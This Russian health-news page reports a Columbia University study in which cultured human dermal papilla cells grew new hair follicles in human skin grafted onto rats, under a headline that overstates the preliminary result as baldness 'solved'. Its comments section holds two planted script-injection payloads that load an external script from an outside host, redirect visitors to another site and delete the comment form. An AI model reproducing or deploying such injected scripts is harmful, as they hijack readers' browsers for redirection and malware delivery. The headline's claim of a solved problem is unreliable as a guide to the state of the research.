Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Проблема облысения решена...  >>  Проблема облысения решена! Врачи заставляют лысые головы покрываться волосами!
 
Обратная связь
 

Проблема облысения решена! Врачи заставляют лысые головы покрываться волосами!

Размер шрифта
12 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Исследователи из медицинского центра Колумбийского университета (Нью-Йорк, США) разработали новый метод лечения облысения. С его помощью специалисты стимулируют рост новых волос, что выгодно отличает этот метод от других разработок, которые основываются лишь на перераспределении уже имеющихся волос по поверхности головы.

Проблема облысения решена! Врачи заставляют лысые головы покрываться волосами!

«Хирургическая трансплантация волос – весьма эффективная методика, однако у 90% женщин, страдающих от облысения, недостаточно донорских волос, а значит, трансплантация для них – едва ли вариант», – рассказывает Анджела Кристиано, один из со-авторов исследования. «Метод, представленный нами, запускает рост и развитие принципиально новых фолликулов, поэтому значительный волосяной массив здесь не нужен – мы опираемся на скрытые ресурсы организма. Для пациентов с предельно сниженным количеством фолликулов (например, при женском типе облысения или при ожогах головы) этот метод может стать настоящим чудом и спасением».

Впервые ученым удалось с успехом применить потенциал так называемых дермальных сосочковых клеток. Это подвид стволовых клеток, которые залегают глубоко в структуре фолликула.

«Вот уже сорок лет внимание ученых устремлено к этим удивительным клеткам, однако непосредственная манипуляция ими до недавнего времени была непреодолимой задачей», – рассказывает Колин Джахода, ведущий профессор научной группы, специалист в области стволовых клеток. «В культуре тканей эти клетки стремительно теряют свои регенеративные свойства, превращаясь в обычные клетки кожи. Нам нужно было преодолеть это препятствие, и мы это сделали».

Благодарить за это следует крыс. Их сосочковые клетки оказалось очень легко собирать, инкубировать и трансплантировать обратно в кожу животных. В сравнении с человеческими клетками крысиные продемонстрировали большую устойчивость, которая, по-видимому, объясняется их склонностью к формированию клеточных групп, или кластеров, даже в тканевой культуре. Ученые предположили, что эти кластеры создают вокруг себя микросреду, которая поддерживает их репродуктивный потенциал на высоком уровне, что в конечном итоге приводит к развитию принципиально новых волосяных фолликулов.

«Это значит, что если бы мы смогли культивировать человеческие сосочковые клетки в аналогичной кластерной структуре, то получили бы на выходе неиссякаемый источник волос для наших пациентов», – говорят авторы.

Для проверки этой гипотезы ученые извлекли сосочковые клетки из кожи семи человеческих доноров. Затем их поместили в тканевую культуру, при этом никакие дополнительные ростовые факторы не добавлялись. Спустя несколько дней клетки трансплантировались в человеческую кожу, которая была пересажена на спину крыс. В итоге пять из семи образцов прижились и дали рост новым волосяным фолликулам, которые успешно развивались в течение шести недель. Генетический анализ подтвердил человеческое происхождение новообразованных волос.

«Этот подход может стать основой для создания новой методики лечения облысения», – уверен доктор Кристиано. «Средства текущего поколения замедляют процесс выпадения волос или, в лучшем случае, воздействуют на уже имеющиеся волосяные фолликулы. Мы же создаем волос с нуля – это настоящая революция».

Впрочем, ученые подчеркивают, что необходимо уточнить ряд моментов перед тем, как приступать к масштабным исследованиям на людях. «Необходимо исследовать характеристики новообразованных волос, такие как: кинетика роста, цвет, текстура и так далее», – говорит доктор Джахода. «Кроме того, важно выяснить, каким именно образом сосочковые клетки взаимодействуют с окружающим эпидермисом».

Но первый, важнейший шаг по созданию ультимативного средства борьбы с облысением – уже сделан.

О других невероятных возможностях эстетической медицины читайте на страницах нашего специального проекта «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Естественная красота и здоровье волос   Еда может заставить вас светится от красоты! Что есть?!   Как сделать себя красивой? Филлеры   Почему трескаются губы  
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Что ваши волосы говорят о вас
40% лысеющих – женщины! Как не стать лысой
Все мифы об уходе за волосами

Тесты

1
Как устроены волосы человека?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.